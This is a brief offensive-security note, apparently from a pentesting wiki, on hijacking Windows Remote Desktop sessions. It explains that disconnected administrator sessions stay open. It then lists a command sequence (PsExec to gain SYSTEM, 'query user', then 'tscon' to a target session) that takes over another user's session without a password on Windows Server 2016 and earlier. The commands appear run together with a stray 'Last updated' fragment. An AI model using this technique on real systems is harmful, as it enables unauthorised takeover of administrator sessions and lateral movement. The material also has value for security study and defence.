RDP Hijacking
When an administrator uses Remote Desktop to connect to a machine and closes RDP client instead of logging off, his session will remain open on the server INDEFINITELY!
If you have SYSTEM privileges on Windows Server 2016 and earlier, you can take over any existing RDP session without requiring a password.
cmd.exe (as administrator)PsExec64.exe -s cmd.exequery usertscon SESSION_NUM /dest:SESSION_NAMELast updated